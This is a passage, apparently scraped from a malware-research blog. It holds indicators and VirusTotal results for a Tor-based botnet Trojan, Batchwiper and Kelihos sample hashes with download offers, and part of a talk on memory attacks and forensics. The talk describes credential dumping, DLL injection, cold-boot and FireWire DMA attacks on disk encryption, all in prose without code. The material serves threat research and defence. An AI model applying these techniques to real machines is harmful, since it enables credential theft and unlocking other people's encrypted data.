%USERPROFILE%\Application Data\tor\lock
%USERPROFILE%\Application Data\tor\state
%USERPROFILE%\Local Settings\Application
Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook
Express\Folders.dbx
%USERPROFILE%\Local Settings\Application
Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook
Express\Inbox.dbx
%USERPROFILE%\Local Settings\Application
Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook
Express\Offline.dbx
%USERPROFILE%\Local Settings\Application
Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook
Express\Sent Items.dbx
%USERPROFILE%\Local Settings\Temp\OpenCL.dll
%USERPROFILE%\Local Settings\Temporary Internet
Files\Content.IE5\1Y7JRJG6\test[1].txt
%USERPROFILE%\Application Data\Egoffi\poofd.tmp
deleted_files
%USERPROFILE%\Application Data\tor\cached-descriptors
%USERPROFILE%\Application Data\tor\cached-descriptors.new
%USERPROFILE%\Application Data\tor\hidden_service\hostname
%USERPROFILE%\Application Data\tor\state
%USERPROFILE%\Application Data\tor\unverified-consensus
%USERPROFILE%\Cookies\laura@accounts.google[2].txt (plus all other cookies)
%USERPROFILE%\Local Settings\Temp\MPS9.tmp
%USERPROFILE%\Local Settings\Temp\tmp1c031ecd.bat
%USERPROFILE%\Local Settings\Temporary Internet
Files\Content.IE5\17K91ZPH\gate[1].htm
%USERPROFILE%\Local Settings\Temporary Internet
Files\Content.IE5\1Y7JRJG6\config[1].bin
%USERPROFILE%\Local Settings\Temporary Internet
Files\Content.IE5\1Y7JRJG6\gate[1].htm
%USERPROFILE%\Local Settings\Temporary Internet
Files\Content.IE5\1Y7JRJG6\webhp[1].txt
State
# Tor state file last generated on 2012-12-23 21:40:56 local time
# Other times below are in GMT
# You *do not* need to edit this file.
TorVersion Tor 0.2.2.35 (git-b04388f9e7546a9f)
LastWritten 2012-12-24 02:40:56
The description below is from Symantec
> "When the Trojan is executed, it creates the following files:
>
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS
> FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS
> FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].tmp
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS
> FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].upp
> C:\Documents and Settings\Administrator\Application Data\tor\cached-certs
> C:\Documents and Settings\Administrator\Application Data\tor\cached-consensus
> C:\Documents and Settings\Administrator\Application
> Data\tor\cached-descriptors
> C:\Documents and Settings\Administrator\Application
> Data\tor\cached-descriptors.new
> C:\Documents and Settings\Administrator\Application
> Data\tor\hidden_service\hostname
> C:\Documents and Settings\Administrator\Application
> Data\tor\hidden_service\private_key
> C:\Documents and Settings\Administrator\Application Data\tor\lock
> C:\Documents and Settings\Administrator\Application Data\tor\state
> C:\Documents and Settings\Administrator\Local Settings\Temp\OpenCL.dll
> The Trojan then creates the following registry entry:
> HKEY_USERS\S-1-5-21-1172441840-534431857-1906119351-500\Software\Microsoft\Windows\CurrentVersion\Run\{58918AFF-36B7-5CDE-6038-278B35A6192F}:
> "C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS
> FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe"
>
> The Trojan copies itself to the following location:
> %UserProfile%\Application Data
>
> The Trojan creates a directory with a random name and renames itself with a
> random string.
>
> The Trojan injects itself into an svchost.exe process and terminates the
> original process.
>
> The Trojan connects to an IRC channel and receives commands which may perform
> the following actions:
>
> Steal information from the compromised computer and send it to the remote
> attacker
> Download and execute files from a remote location
> Download and inject files into a running process
> Connect to an arbitrary URL
> Set up a SOCKS proxy
> Support denial-of-service attacks
> The Trojan drops the following files:
>
> Tor: A network client for the Tor anonymous network that is used to route and
> hide all the network traffic the threat sends to the IRC C&C server
> Trojan.Zbot: An additional threat installed by Trojan.Tbot
> CGMiner: An open source bitcoin mining tool used for performing CPU intensive
> work in exchange for Bitcoin currency"
Automatic scans
https://www.virustotal.com/file/12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60/analysis/1356590536/
SHA256:12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60
SHA1:93cf1d65e0374410a9a827256a923fdb8f5f38ca
MD5:a0552d1bc1a4897141cfa56f75c04857
File size:10.0 MB ( 10491998 bytes )
File name:vti-rescan
File type:Win32 EXE
Detection ratio:12 / 44
Analysis date: 2012-12-27 06:42:16 UTC ( 1 minute ago )
AntiVirTR/Drop.Injector.gmtj20121226
AvastWin32:FakeAV-EEX [Trj]20121227
AVGWin32/Cryptor20121226
CAT-QuickHealTrojanDropper.Injector.gmtj20121227
ESET-NOD32a variant of Win32/Injector.YYR20121226
FortinetW32/Injector.YYR!tr20121227
GDataWin32:FakeAV-EEX20121227
IkarusTrojan.SuspectCRC20121227
KasperskyTrojan-Dropper.Win32.Injector.gmtj20121227
PandaTrj/CI.A20121226
TrendMicro-HouseCallTROJ_GEN.R47B1LM20121227
VIPRETrojan.Win32.Generic!BT20121227
https://www.virustotal.com/file/d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3/analysis/1356590487/
SHA256:d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3
SHA1:21ff7e6c1bc9fb2977f45cde72599a831be3af03
MD5:2e1814cccf0c3bb2cc32e0a0671c0891
File size:17.1 MB ( 17949744 bytes )
File name:vti-rescan
File type:Win32 EXE
Detection ratio:25 / 44
Analysis date: 2012-12-27 06:41:27 UTC ( 1 minute ago )
AhnLab-V3Dropper/Win32.Injector20121226
AntiVirTR/FakeAV.92.39120121226
AvastWin32:FakeAV-EEX [Trj]20121227
AVGDropper.Generic7.TIN20121226
BitDefenderGen:Variant.FakeAV.9220121227
CAT-QuickHealTrojanDropper.Injector.ggbl20121227
ComodoUnclassifiedMalware20121227
ESET-NOD32a variant of Win32/Injector.YYR20121226
F-SecureGen:Variant.FakeAV.9220121227
FortinetW32/Injector.YYR20121227
GDataGen:Variant.FakeAV.9220121227
IkarusTrojan.SuspectCRC20121227
K7AntiVirusRiskware20121226
KasperskyTrojan-Dropper.Win32.Injector.ggbl20121227
McAfeeArtemis!2E1814CCCF0C20121227
McAfee-GW-EditionArtemis!2E1814CCCF0C20121226
MicroWorld-eScanGen:Variant.FakeAV.9220121227
NormanW32/Troj_Generic.FPNGA20121226
PandaTrj/CI.A20121226
SymantecWS.Reputation.120121227
TrendMicroTROJ_GEN.RCBZ7LB20121227
TrendMicro-HouseCallTROJ_GEN.RCBZ7LB20121227
VBA32Trojan-Dropper.Injector.ggbl20121226
VIPRETrojan.Win32.Generic!BT20121227
ViRobotDropper.A.Injector.1794974420121227
Others have similar detection - mostly generic for this type of malware
19/45 https://www.virustotal.com/file/4eb9799a2c4febffb81260abb889c909b4eaa28344a4e708d2b3231985311ec3/analysis/1356590570/
34/45
https://www.virustotal.com/file/ab8b7a7e6d5e2f98e85489c0d71e005842c3a6e085f8c4dd9f3011bfc9dbc18d/analysis/1356590585/
13/45
https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/1356590598/
21/45
https://www.virustotal.com/file/e46ad827327bdcf841d0eea03675e2f7b3eafbe3a9b8fab96a9e3df586480870/analysis/1356590507/
13/45
https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/
DEC 2012 BATCHWIPER SAMPLES
January 18, 2013, 4:35 am
Next Trojan 'Nap" aka Kelihos/Hlux status update by DeepEnd Research and samples
Previous Dec. 2012 Skynet Tor botnet / Trojan.Tbot samples
0
0
Update: Jan 18, 2013 - Here is a nice analysis BatchWiper Analysis by Emanuele
De Lucia
The next time the virus will wake up is Jan 21, 2013. Time to grab it, read and
play.
Image may be NSFW.
Clik here to view.Several people asked for Batchwiper, so here are the samples.
From Maher - Iranian CERT:
Latest investigation have been done by Maher center in cyber space identified a
new targeted data wiping malware. Primitive analysis revealed that this malware
wipes files on different drives in various predefined times. Despite its
simplicity in design, the malware is efficient and can wipe disk partitions and
user profile directories without being recognized by anti-virus software.
However, it is not considered to be widely distributed. This targeted attack is
simple in design and it is not any similarity to the other sophisticated
targeted attacks. The identified components of this threat are listed in the
following table:
Name
MD5
GrooveMonitor.exe [dropper]
f3dd76477e16e26571f8c64a7fd4a97b
juboot.exe
fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe
c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE
ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe
b7117b5d8281acd56648c9d08fadf630
File
Image may be NSFW.
Clik here to view. Download. Email me if you need the password
TROJAN 'NAP" AKA KELIHOS/HLUX STATUS UPDATE BY DEEPEND RESEARCH AND SAMPLES
February 10, 2013, 3:09 pm
Next Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech
Bridge
Previous Dec 2012 Batchwiper Samples
0
0
Image may be NSFW.
Clik here to view.
FireEye posted details about the sleep function found in Kelihos/Hlux (An
encounter with Trojan Nap), which is interesting, and indeed is present in some
of the samples we saw. The trojan, of course, has many more features, and most
of them were documented in previous publications online. This post is a quick
update on the state of Kelihos/Hlux botnet, along with the list of known fast
flux domains (1500+) associated with with Kelihos distribution or
Command&Control. (current > 2012). The current and most active name servers are
pointing to the ns[1-6].boomsco.com, ns[1-6].larstor.com, and
ns[1-6].zempakiv.ru which are also fast flux domains. The double fast flux
nature of the botnet makes it very difficult to take down, and sinkholing is a
temporary measure. Despite the two large attempts to take it down (Sep.2011 and
Mar. 2012), the botnet is definitely on the rise again.
Please read the rest of our post
here http://www.deependresearch.org/2013/02/trojan-nap-aka-kelihoshlux-feb-2013.html.
You can download the associated binaries (97 files) and pcap below.
Download
Image may be NSFW.
Clik here to view.Download the file set (97 files, see the listing below). Email
me if you need the password
Download the pcap (no password) - for 0C921935F0880B5C2161B3905F8A3069
Files Information
97 files, there are a few variants, the files are recent and mostly active.
01B43C0C8D620E8B88D846E4C9287CCD
036ADB0D4B856C2A5E16175BD089FF24
03F3B93A9B3D70D9BB9AD829A5F2361D
0481B4B12C8C69B735CAC2A918B52790
0530898731D7165DBABBF6BF252BA77E
08862142D7313A1D431D67E0E755EFC7
093586512549F2D016AD4C70F4F8E5C8
0BF067750C7406CF3373525DD09C293C
0C921935F0880B5C2161B3905F8A3069
0FEAAA4ADC31728E54B006AB9A7E6AFA
15B6DFADD045E8282C4927F8BDD69D3E
15B9C9632510FB4D387D4A02ABF830DD
1B342E6682167571B55AB59F3DD38D1E
1C04C6B4E0BBBC99CCEE489270C98622
1E08449CE5848B6ADFEE48B1582EAEEF
223D32E3F6BB9C5A6AD3CD58B898EFA1
223F7E425BD28AE13A54B2D0017D1E81
22AE2A6FF14C58265B5C79FBC25A91B6
2304FA9A6A67984CA0FF9E9BF561817A
23585DCBA9DFD4719ECC20B2D662D983
25B4C1C68C58D7D559E8682117D7C01F
288E85A4A7756268EBDED1F356531E03
28A417B0EA5BE796720463607F06CCC9
2B4A5F1C8225D9043AE1302DCCD7063B
2F091B59382F6CA9E1233EE38B171B2E
30EA180ECE416600DABC5ADA0F630D06
352A8AB0D5C7DB40F865B0E7E03B1D96
36C90E73120A419B4B00E66177040F43
3774D5BD50F4286531FEDF716D83FC6E
396B88D48CC04A8C37F4409F65EA8A97
3A76AA2439112479635D7172DB2440B1
3B6A3354B71CD674D4BC27646D270502
3D0F09DA5C5DBDB2124AEB0953F355B7
3D711B47C8FDE2C6A5E62D6AD0BA7BB5
44B342383E286465D74A838EE0780DDA
49B6D19F9307C3BBA460C936ADE26B70
4B6DFE2A4B0EF515275AC84B378D5F6F
4C2DB57ED5D27F54120765A9FA9C3BC7
51D3E04AF7E29A1E3A1748E03F0BD578
56AD23082E5E73AAEB95E5A915DF5444
5ACA74320003576F79CF6EDD0629CC13
5B947FEAA5BFA951C94B11BB9EEA9BC3
5BA7D2DE0CCC58F104240610BF297E6E
5BECB2498EA801ED010DD073007E20CE
5FFE38CA9FE07394D1BC5C270E83B253
63C926F659C3EDEC0B85C91898622A4D
69170C0C9FB4EEC6A630C4C9182505F0
6AA100C459E854A9A334B10468EAD014
6B873B6D21ECC9ADF7246D644B23FB84
6F6B016A5DB1791188D7C98A464292CC
70FD6A11E482D756BEF27546AA112206
72C1BEC266B23AF5CB12AE2F669D8784
7316D0EE9C0B6C23C7CEB2D04DC6B665
766A50581F6E47FF94126C5DBBD9FB01
76B7BB0CC2E3623078BF9E9A9A343CE1
77E2D2A1E508EA30D548293E2C36D64F
787F39D70D2BEC3139A6EA7690B88464
7E1B91800F2FE9974C7BB18A7097D933
7F7E0C58BDF1E47059DD84FFB301F6B7
8005E44761B842370D43299B29B0F16A
80E595253D3E02071D2564BA8296D308
84741D6DFFC996D35B8DC0A01111A5DE
9010DD12A1419E0F0098FD10CA324E23
9424EB9DE0558193A6B4D9607C23CBD5
9C075FB471DC66394090C8BFAA4739A4
9CA42C5B352DEFB53F8D30C16B36697A
A13B21423C5AE7BA318D0D26E672AD22
A15F02836309B819DE10068ED49D5D87
A56577564E52251C54B27D4CA62C266F
A78BE2345E524515E0DD1CCCA3C524F9
A8ABECD7C571AAEE6C964514133585F3
A910A324394B56022C7AC10DB22EC3F6
B1ABD1279A28F22B86A15D6DAFBC28A5
B568CF0982C867CD499F953E43738511
B63F25D5B02FE00D9423A7CCC0C3CCE2
B66475ED30943C0056C9402DCAECB8B9
BB5560123C62588988BC22C704CD9E03
C06414E1994BF4EFA41911CA81099411
C465888536A6785883079043F38143BD
C98F3F5709292D6D97AD96C1A8459A81
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94
CCA50DCB8A30B325BF10CED5DAE4D51A
CE391D2B2036365D8943257FE1CB967E
D4CBEABAE5B4D4BAF14F554C8E9A4E86
DCE41A00FB703B6A6324CE4F4C4DB143
DE5FDBAD9274B21EA5391F48441D33D8
DEAF70F248599985FC32B083F16F251A
DF1A932144BF2C6E50FD090FDC1F1408
DFE01E12671BBDD7EC0F8BEBA08EC440
E2F8F5C80566BF32E1841B3C5A669D42
E453463A428A71A5DB19FC18807E747B
EB17EB2F02FA871C005C569B3299FCBA
EB4DBB18D00321A809A6C4D8594DDF5A
F5A6FC81A4F5AE6DEBFAC463DD49E1C2
F604C7E4EC3A12A83E0852A9D7FE75CA
F96EBF8128BFC6965C73A2659718C663
FE501F12B34701CF8AF5DD307C314862
Search
RSSing.com
--------------------------------------------------------------------------------
MANIPULATING MEMORY FOR FUN AND PROFIT BY FRÉDÉRIC BOURLA - HIGH-TECH BRIDGE
February 15, 2013, 6:57 pm
Next Jan 2013 - Linux SSHDoor - sample
Previous Trojan 'Nap" aka Kelihos/Hlux status update by DeepEnd Research and
samples
0
0
Image may be NSFW.
Clik here to view.I am sure you remember excellent reverse engineering
presentations by High-Tech Bridge experts I posted earlier. High-Tech
Bridge presented at the ISACA event in Luxembourg and you can download their
detailed and very interesting presentation: “Manipulating Memory for Fun and
Profit".
The presentation includes detailed memory forensics process using Volatility
by Frédéric BOURLA
Chief Security Specialist
Head of Ethical Hacking & Computer Forensics Departments
High-Tech Bridge SA
Table of Contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
Download the full presentation in PDF
The text of the presentation (for Google search and to get an idea about the
contents:)
========================
Manipulating Memory for Fun & Profit
6 February 2013
Frédéric BOURLA
Chief Security Specialist
========================
# readelf prez
* Slides & talk in English.
* Native French speaker, so feel free to send me an email in French if case of
question.
* Talk focused on Memory Manipulation, from both offensive and defensives
angles.
* 1 round of 45’.
* Vast topic, lots of issues to address, and lots of slides so that the most
technical of you can come back later to remember commands.
* Therefore some slides [specially the beginning] will be fast, but everything
is summarized in demos.
* No need to take notes, the whole slides and demos will be published on
High-Tech Bridge website.
========================
# readelf prez
* Despite its name, this talk will not deal with Total Recall or any other
human memory manipulation based movie.
* Nor will it deal with classical binary exploitation, such as Stack based
Buffer Overflows or Heap Spraying. I strongly advice to read corelanc0d3rs’
papers on corelan.be to learn more regarding Exploit Writing.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
# man mem
* RAM (Random Access Memory) is a temporary memory accessible by the CPU in
order to hold all of the program code and data that is processed by the
computer.
* It is called “random” because the system can directly access any of the
memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and
its column (i.e. “data bit”).
* It is much faster to access data in RAM than on the hard drive.
* CPU and OS determine how much and how the available memory will be used.
========================
# man mem
* In other words, most users do not have any control on memory, which makes
RAM a target of choice.
* First systems were arbitrary limited to 640Kb RAM. Bill Gates once declared
that “640K ought to be enough for anybody”.
* At this time it was far enough… But today the OS itself can consume 1 Gb. We
therefore use much more memory.
* On a 32 bits Windows system, OS can directly address 2^32 cells, and is
therefore mathematically limited to 4 Gb memory.
========================
# man mem
* Contrary to popular assumption, RAM can retain its content up to several
minutes after a shutdown.
* Basically RAM is everywhere nowadays. Printers, fax, VoIP phones, GPS and
smartphones are good examples.
* This provide some opportunities to security professionals [and also to bad
guys]. Some points of this talk can be applied to various targets and may not be
limited to Windows systems, even if since now we will deal with a classical
Microsoft host.
========================
# man mem
* Upon process instantiation, the code is mapped in memory so that the CPU can
read its instructions, and each process has his own virtual memory.
* OS relies on page table structures to map transparently each virtual memory
address to physical memory.
* But most importantly, any program [including both its data and its
instructions] must first be loaded into memory before being run by the
processor.
========================
# man mem
* For example, FUD Trojans which highly rely on Packers & Crypters can be
quickly uncovered through memory analysis.
* The same principle applies to OFTE. Memory Analysis can save your
investigator's life, should you be facing a drive with On The Fly Encryption
capabilities. To be efficient, transparent and usable, the [encrypted] key
should be somewhere in memory.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Post keylogging capacities
* A colleague just used your laptop to access a restricted page, and you
regret you didn’t have time to run your favourite keylogger? :-]
========================
Post keylogging capacities
* No a problem, you may be able to browse the Internet browser’s memory to
grab his credentials.
========================
Post keylogging capacities
* Besides this joke, have you ever wished you had saved your new email before
a touchpad problem occurs and make you loose 30 minutes?
========================
Post keylogging capacities
* But you may not be obliged to restart writing everything from scratch if you
browse the process memory shortly.
========================
Stars revelation
* In a pivoting attack, it can be very useful to reveal what’s behind the
stars... Don’t forget, Windows remembers lots of passwords in behalf of users.
* Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of
them do not work against recent OS.
* BulletsPassView is one of the remaining tools which still works under
Windows 7. There is even a 64 bits version.
* Anyway, it also does not work under Windows 8.
========================
Stars revelation
========================
Stars revelation
* Pillaging passwords often provide the keys of the kingdom.
========================
Memory Patching
* Memory Patching is the first stone to build a Crack or create a Keygen in
the Warez world.
* It basically consists of locating and bypassing binary protections in memory
in order to finally implement the trick in the targeted file.
========================
Memory Fuzzing
* Fuzz Testing, aka Fuzzing, consists in providing invalid, unexpected, or
random data to the inputs of a monitored program to detect security issues
[among others].
* General approach to Fuzzers:
========================
Memory Fuzzing
* Memory-oriented Fuzzing:
========================
Memory Fuzzing
* Here is an example from dbgHelp4j, a memory fuzzing project under
development at High-Tech Bridge:
* To learn more, read Xavier ROUSSEL’s paper.
* This short demonstration shows how dbgHelp4j permits to identify rapidly an
old buffer overflow in the CWD Command of Easy FTP Server v1.7.0.11.
========================
DLL Injection
* Another well-known memory abuse consists in injecting arbitrary code into
the memory space of another process, for example through a CreateRemoteThread
like function.
* Such an injection permits the attacker to benefit from the rights of the
target process, and often to bypass firewalls.
* This also enable its author to hide himself from most users, as threads are
not displayed in Windows Task Manager.
========================
DLL Injection
* Native task manager does not display current threads within a process.
========================
DLL Injection
* Here a DLL based Reverse Trojan is injected into IE memory space.
========================
DLL Injection
* Trojan reaches its C&C Server via HTTP through Internet Explorer [whose
behaviour sounds right].
========================
DLL Injection
* From a Pivoting Attack point of view, DLL Injection is widely used during
Privilege Escalation.
* There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX.
* Most tools actually inject their nasty code into the Local Security
Authority Subsystem (LSASS) to reach hashes.
* The latter is amazingly efficient and permits a user with administrative
privileges to retrieve [either locally or remotely] the domain password cache,
password hashes and LSA secrets from a Windows system.
========================
Process Memory Dump
* Some processes write sensitive data in memory in clear text format, or
without relying on heavy encryption.
* Specific process memory dumps may allow an attacker to grab interesting
data.
* Lots of tools do exist. One of the best ones is probably ProcDump, from Mark
Russinovich.
* It’s a powerful command-line utility which primary purpose is to monitor
applications for CPU spikes in order to generate a crash dump with the purpose
of helping the developer to debug.
========================
Process Memory Dump
* It has plenty of amazing features. Anyway, here our goal is simply to dump
the memory contents of a process to a file [without stopping the process of
course].
* So lots of tools can also do the job, such as PMDump from NTSecurity.
* Sometimes we can find very sensitive information, such as usernames,
computer names, IP addresses, and even passwords.
* This is for example the case if you dump the memory of PwSafe. Not all
fields are encrypted in memory.
========================
Process Memory Dump
* For sure, password fields are not stored in memory in plaintext, but
unfortunately other fields are. And sysadmin’s notes are often very juicy...
* There is hope to collect credentials, map network resources, identify
services, ports, sudoers account, and so on.
* Even if the auditor is unlucky and does not grab passwords, he can still
create a user list file for further dictionary attacks.
========================
Process Memory Dump
* Process Memory Dump files are quite light.
* During a Pivoting Attack in an Internal Penetration Test, it may worth a try
to launch a memory dump against sensitive processes.
========================
Process Memory Dump
* Something as easy as parsing the process memdump for strings may reveal
interesting stuff to a pentester.
========================
Process Memory Dump
* Here the Password Safe application permits an attacker to fingerprint the
network, and to collect usernames, IP addresses and ports.
* Very useful to carry out further attacks.
========================
Process Memory Dump
* Here the network administration tool mRemote leaks internal path, IP address
and TCP port of an SSH enabled server… As well as the username & password of a
root account!
========================
Full Memory Dump
* If you have a good bandwidth and you are not so limited by the time, why not
dumping the whole memory?
* An offline analysis of the whole memory dump may even reveal more important
stuff. Even in the case of FDE, users may have opened sensitive TXT documents
for example.
* You may add DumpIt to your toolkit. It is a one-click memory acquisition
application for Windows released by MoonSols. It’s a great tool which combines
win32dd and win64dd in one executable. It is fast, small, portable, free and
ultra easy to use. Just run in to dump the physical memory in the current
directory.
========================
Cold Boot Attacks
* It is a common belief that RAM looses its content as soon as the power is
down.
* This is wrong, RAM is not immediately erased. It may take up to several
minutes in a standard environment, even if the RAM is removed from the computer.
* And it may last much longer if you cool the DRAM chips. With a simple dusty
spraying at -50°C, your RAM data can survive more that 10 minutes.
* If you cool the chips at -196°C with liquid nitrogen, data are hold for
several hours without any power.
========================
Cold Boot Attacks
* It is then possible to plug the RAM in another system to dump their content
to carry out an offline analysis.
* In particular, encryption tools deeply rely on RAM to store their keys.
Therefore such attacks are mostly aimed to defeat FDE, such as BitLocker,
FileVault, dm-crypt, and TrueCrypt.
* And even if there is some kinds of degradation in the memory contents, some
algorithms can intelligently recover the keys.
* To know more, read the Princeton University's paper.
========================
DMA based attacks
* IEEE1394, aka FireWire, is a serial bus interface standard for high-speed
communications and isochronous real-time data transfer.
* According to Wikipedia, it “supports DMA and memory-mapped devices, allowing
data transfers to happen without loading the host CPU with interrupts and
buffer-copy operations”.
* In other words, you can read [and write] in the target’s memory through its
FireWire interface!
* This security problem is not new [2004], but still exists today as it relies
in IEEE 1394 specifications.
========================
DMA based attacks
* A few years ago, attackers could use WinLockPwn. Today they have Inception
tool, from ntropy.
* Inception is a physical memory manipulation and hacking tool which nicely
exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2].
* The tool can unlock and escalate privileges to Administrator / Root on
almost any powered on machine you have physical access to.
* The tool works over any interface that expands and can master the PCIe bus,
such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card).
========================
DMA based attacks
* It is initially made to attack computers that utilize FDE, such as
BitLocker, FileVault, TrueCrypt or Pointsec.
* You just need a Linux / Mac OS X system and a target which provides a
FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port.
* There are for sure some limitations, such as the 4 GiB RAM bugs or the
restrictions on OS X Lion targets [which disables DMA when the user is logged
out as well as when the screen is locked if FileVault is enabled], but most
often FireWire means P0wned.
========================
DMA based attacks
* Just a few lines to install on a your BackTrack:
* The short following demo of Inception exploits the FireWire interface of an
up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running
session.
========================
DMA based attacks
* This kind of DMA based attacks also permit to attack mounted encrypted
volumes, such as a TrueCrypt archive.
* You can for example boot your attacking system with PassWare FireWire Memory
Imager from Passware Kit Forensics, and search for AES keys in the target memory
through FireWire.
* You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encryption
volumes.
* To know more: http://www.breaknenter.org/projects/inception/
http://support.microsoft.com/kb/2516445
========================
DMA based attacks
* The following slides illustrate an attack on a TrueCrypt volume created on
an 8 Gb memory stick.
* First step was to backup the encrypted drive.
========================
DMA based attacks
* Then let’s begin the attack on a mounted volume when the user went.
========================
DMA based attacks
* Dump the physical memory of the target system through our favourite FireWire
interface.
========================
DMA based attacks
* And attack the key material in memory…
========================
DMA based attacks
* The attack only last a couple of minutes.
========================
DMA based attacks
* And you should get an unencrypted raw volume.
========================
DMA based attacks
* You just have to fill a new memory stick with this raw image…
========================
DMA based attacks
* And that’s it ! Just plug your new device…
========================
DMA based attacks
* And enjoy your TrueCrypt less volume.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Circumventing FDE
* Traditional Forensics approach faces problem with encryption, especially
with FDE.
* If the investigator “pulls the plug” and creates a bit-for-bit image of the
physical hard drive, he most probably destroys the best chance of recovering the
plaintext data, as well as all common memory artefacts.
* With FDE, it is usually far better to make a bit-for-bit image of the
logical device while the system is still running, even if underlines disk
activities are generally not welcome… And even if we rely on an untrusted OS to
present what is actually on the disk, therefore prone to anti-forensic
techniques.
========================
Circumventing FDE
* If we begin by capturing the volatile memory, then we can potentially
extract the cryptographic keys from the memory image to decrypt and analyse the
disk image.
* The only one challenge usually consists in uniquely identifying key
materials among gigabytes of other data.
* It is usually achieved with a mixed of entropy analysis [limited because of
the short length of symmetrical keys and the randomness of other data, such as
compressed files] and brute force attack [Known-Plaintext Attack, where the
attacker has samples of both the plaintext and the ciphertext].
* To learn more: “RAM is Key - Extracting Disk Encryption Keys From Volatile
Memory", by B. Kaplan and M. Geiger).
========================
Code Analysis via API Hooking
* A quick way to have an idea of what a binary does is to analyse its API
calls.
* You can do it easily with APISpy32 for example, from Pietrek.
* You just need to populate a configuration file with the name of all the API
[e.g. per a strings] you want to enable Hooking, and you get a nice malcode
monitoring tool.
* Next slide shows common API use in malware.
========================
Code Analysis via API Hooking
Common API
Malware
URLDownloadToFile, FtpGetFile, FtpOpenFile
Dropper
CreateRemoteThread, NtWriteVirtualMemory,
LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.)
Injection
BeginPaint (to disable local screen changes when a VNC session is activated)
Zeus
Accept, Bind
Backdoor
Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe
Dropper and Reverse Trojan
IsDebuggerPresent, CheckRemoteDebuggerPresent
Anti debugger
========================
Code Analysis via API Hooking
Common API
Malware
CryptCreateHash, CryptEncrypt, CryptGetHashParam
Encryption
DeviceIoControl, NtLoadDriver, NtOpenProcess
Rootkit
HttpOpenRequest, HttpSendRequest, InternetConnect
Exfiltration
ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport,
NtExecuteAddFileOptOutList
DEP
SetSfcFileException
Windows File Protection alteration
========================
Memory Forensics
* It is probably the best way to identify the most hidden evil code, such a
Rootkits.
* And don't forget that some malware can live in memory without ever touching
the hard disk. This is for example the case with MSF Meterpreter, which is
injected into existing process memory.
* Stealth malware also work in that manner [mostly in targeted hacking against
big companies].
* Hard disks are amazingly big today. Simply creating a raw image can take
very long time... Sometimes several days. Analysing memory is much faster.
========================
Memory Forensics
* But there are also some minor drawbacks… Indeed, the memory image will only
give us information on what was running at a particular time. We will not see
the most visible piece of malcode if it was not running when we proceed with the
imaging [unless some tracks remain in undeleted structures].
* And fore sure, to make an image of the memory we first need to run once a
specific utility... Which will be loaded in the targeted memory! As a
consequence, it is always possible to alter evidence [even if chances are really
low with a light utility].
* Anyway, it definitely worth a try as a fast analysis can help you spot the
evidence very quickly. :-]
========================
Memory Forensics
* Any kind of physical memory abstract could be usable, such as a Memory Dump,
a Crash Dump, an hibernation file or a VMEM file for virtual machines.
========================
Memory Forensics
* Memory Forensics is a very huge project, as memory mappings differ from OS,
SP and patch levels, and as vendors usually do not really document their
internal memory structures.
* Nevertheless, it is mature and efficient since a few years. Nowadays, we are
not limited anymore to ASCI and Unicode grep, and we can now rely on powerful
tools which parse well known memory structures.
========================
Memory Forensics
* For sure, we are still facing challenging problems, and tools may be limited
by Paging and Swapping which can prevent investigators from analysing the whole
virtual address space of a specific process [unless they also dig into the
pagefile.sys for example]…
* But it is still really effective for Malware Analysis!
* Besite commercial tools, free solutions do exist, such as Radare and
Volatility. The later simply became impressing.
* Since last year, Volatility also support MAC systems.
========================
Memory Forensics
* Shall you need to carry out a Memory Forensics on a Windows, Linux, Mac or
Android system, I strongly advise you to have a look on Volatility.
* It is basically a Python based tool for extracting digital artefacts from
